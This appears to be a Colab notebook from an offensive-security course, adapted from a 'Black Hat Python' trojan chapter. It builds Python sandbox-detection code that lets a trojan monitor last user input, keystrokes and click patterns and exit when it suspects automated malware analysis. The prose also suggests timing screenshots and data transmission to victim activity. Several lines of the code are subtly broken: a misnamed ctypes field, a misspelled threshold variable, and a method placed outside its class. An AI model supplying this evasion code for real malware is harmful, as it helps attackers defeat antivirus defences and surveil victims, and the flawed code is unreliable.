<a href="https://colab.research.google.com/github/damianiRiccardo90/BHP/blob/master/C8-Common_Trojaning_Tasks_On_Windows/Sandbox_Detection.ipynb" target="_parent"><img src="https://colab.research.google.com/assets/colab-badge.svg" alt="Open In Colab"/></a>

### *__Sandbox Detection__*

Increasingly, antivirus solutions employ some form of sandboxing to determine the behavior of suspicious specimens. Regardless of whether this sandbox runs on the network perimeter, which is becoming more popular, or on the target machine itself, we must do our best to avoid tipping our hand to any defense in place on the target's network.

We can use a few indicators to try to determine whether our trojan is executing within a sandbox. We'll monitor our target machine for recent user input. Then we'll add some basic intelligence to look for keystrokes, mouse clicks, and double-clicks. A typical machine has many user interactions on a day in which it has been booted, whereas a sandbox environment usually has no user interaction, because sandboxes are typically used as an automated malware analysis technique.

Our script will also try to determine if the sandbox operator is sending input repeatedly (for instance, a suspicious, rapid succession of continuous mouse clicks) in order to try to respond to rudimentary sandbox detection methods. Finally, we'll compare the last time a user interacted with the machine versus how long the machine has been running, which should give us a good idea whther or not we are inside a sandbox.

We can then make a determination as to whether we would like to continue executing. Let's start working on some sandbox detection code. Open __sandbox_detect.py__ and throw in the following code:

In [ ]:
from ctypes import byref, c_uint, c_ulong, sizeof, Structure, windll
import random
import sys
import time
import win32api

class LASTINPUTINFO(Structure):
    fields_ = [
        ('cbSize', c_uint),
        ('dwTime', c_ulong)
    ]

def get_last_input():
    struct_lastinputinfo = LASTINPUTINFO()
    struct_lastinputinfo.cbSize = sizeof(LASTINPUTINFO) #[1]
    windll.user32.GetLastInputInfo(byref(struct_lastinputinfo))
    run_time = windll.kernel32.GetTickCount() #[2]
    elapsed = run_time - struct_lastinputinfo.dwTime
    print(f"[*] It's been {elapsed} milliseconds since the last event.")
    return elapsed

while True: #[3]
    get_last_input()
    time.sleep(1)

We define the necessary imports and create a __LASTINPUTINFO__ structure that will hold the timestamp, in milliseconds, of when the last input event was detected on the system. Next, we create a function, __get_last_input__, to determine the last time of input. Do note that you have to initialize the __cbSize__ __[1]__ variable to the size of the structure before making the call. We then call the __GetLastInputInfo__ function, which populates the __struct_lastinputinfo.dwTime__ field with the timestamp. The next step is to determine how long the system has been running by using the __GetTickCount__ __[2]__ function call. The elapsed time is the amount of time the machine has been running minus the time of last input. The last little snippet of code __[3]__ is simple test code that lets you run the script and then move the mouse, or hit a key on the keyboard, and see this new piece of code in action.

It's worth noting that the total-running system time and the last-detected user input event can vary depending on your particular method of implantation. For example, if you've implanted your payload using a phishing tactic, it's likely that a user had to click a link or perform some other operation to get infected. This means that within the last minute or two, you'd see user input. But if you see that the machine has been running for 10 minutes and the last detected input was 10 minutes ago, you're likely inside a sandbox that has not processed any user input. These judgment calls are all part of having a good trojan that works consistently.

You can use this same technique when polling the system to see whether or not a user is idle, as you may want to start taking screenshots only when they're actively using the machine. Likewise, you may want to transmit data or perform other tasks only when the user appears to be offline. You could also, for example, track a user over time to determine what days and hours they are typically online.

Keeping this in mind, let's define three thresholds for how many of these user input values we'll have to detect before deciding that we're no longer in a sandbox. Delete the last three lines of test code and add some additional code to look at keystrokes and mouse clicks. We'll use a pure __ctypes__ solution this time, as opposed to the __PyWinHook__ method. You can easily use PyWinHook for this purpose as well, but having a couple of different tricks in your toolbox always helps, as each antivirus and sandboxing technology has its own way of spotting these tricks. Let's get coding:

In [ ]:
class Detector:
    def __init__(self):
        self.double_clicks = 0
        self.keystrokes = 0
        self.mouse_clicks = 0

    def get_key_press(self):
        for i in range(0, 0xff): #[1]
            state = win32api.GetAsyncKeyState(i) #[2]
            if state & 0x0001:
                if i == 0x1: #[3]
                    self.mouse_clicks += 1
                    return time.time()
                elif i > 32 and i < 127: #[4]
                    self.keystrokes += 1
        return None

We create a __Detector__ class and initialize the clicks and keystrokes to zero. The __get_key_press__ method tells us the number of mouse clicks, the time of the mouse clicks, and how many keystroke the target has issued. This works by iterating over the range of valid input keys __[1]__; for each key, we check whether it has been pressed using the __GetAsyncKeyState__ __[2]__ function call. If the key's state shows it is pressed (state & 0x0001 is truthy), we check if its value is 0x1 __[3]__, which is the virtual key code for a left-mouse-button click. We increment the total number of mouse clicks and return the current timestamp so that we can perform timing calculations later on. We also check if there are ASCII keypresses on the keyboard __[4]__ and, if so, simply increment the total number of keystrokes detected.

Now let's combine the results of these functions into our primary sandbox loop. Add the following method to __sandbox_detect.py__:

In [ ]:
def detect(self):
    previous_timestamp = None
    first_double_click = None
    double_clock_threshold = 0.35

    max_double_clicks = 10 #[1]
    max_keystrokes = random.randint(10, 25)
    max_mouse_clicks = random.randint(5, 25)
    max_input_threshold = 30000

    last_input = get_last_input() #[2]
    if last_input >= max_input_threshold:
        sys.exit(0)

    detection_complete = False
    while not detection_complete:
        keypress_time = self.get_key_press() #[3]
        if keypress_time is not None and previous_timestamp is not None:
            elapsed = keypress_time - previous_timestamp #[4]

            if elapsed <= double_click_threshold: #[5]
                self.mouse_clicks -= 2
                self.double_clicks += 1
                if first_double_click is None:
                    first_double_click = time.time()
                else:
                    if self.double_clicks >= max_double_clicks: #[6]
                        if(keypress_time - first_double_click <= #[7]
                           (max_double_clicks * double_click_threshold)):
                           sys.exit(0)
            if (self.keystrokes >= max_keystrokes and #[8]
                self.double_clicks >= max_double_clicks and
                self.mouse_clicks >= max_mouse_clicks):
                detection_complete = True

            previous_timestamp = keypress_time
        elif keypress_time is not None:
            previous_timestamp = keypress_time

if __name__ == '__main__':
    d = Detector()
    d.detect()
    print('okay.')

All right. Be mindful of the indentation in these code blocks! We start by defining some variables __[1]__ to track the timing of mouse clicks and three thresholds with regards to how many keystrokes, mouse clicks, or double-clicks we're happy with before considering ourselves to be running outside a sandbox. We randomize these thresholds with each run, but you can of course set thresholds of your own based on your own testing.

We then retrieve the elapsed time __[2]__ since some form of user input has been registered on the system, and if we feel that it has been too long since we've seen input (based on how the infection took place, as mentioned previously), we bail out and the trojan dies. Instead of dying here, your trojan could perform some innocuous activity such as reading random registry keys or checking files. After we pass this initial check, we move on to our primary keystroke and mouse-click-detection loop.

We first check for keypresses or mouse clicks __[3]__, knowing that if the function returns a value, it is the timestamp of when the keypress or mouse click occurred. Next, we calculate the time elapsed between mouse clicks __[4]__ and then compare it to our threshold __[5]__ to determine whether it was a double-click. Along with double-click detection, we're looking to see if the sandbox operator has been streaming click events __[6]__ into the sandbox to try to fake out sandbox detection techniques. For example, it would be rather odd to see 100 double-clicks in a row during typical computer usage. If the maximum number of double-clicks has been reached and they happened in rapid succession __[7]__, we bail out. Our final step is to see if we have made it through all of the checks and reached our maximum number of clicks, keystrokes, and double-clicks __[8]__; if so, we break out of our sandbox detection function.

We encourage you to tweak and play with the settings as well as to add additional features, such as virtual machine detection. It might be worthwhile to track typical usage in terms of mouse clicks, double-clicks, and keystrokes across a few computers that you own (we mean ones you actually possess, not ones you have hacked into!) to see where you feel the happy spot is. Depending on your target, you may want more paranoid settings, or you may not be concerned with sandbox detection at all.

The tools you developed in this chapter can act as a base layer of features to roll out in your trojan, and because of the modularyty of our trojaning framework, you can choose to deploy any one of them.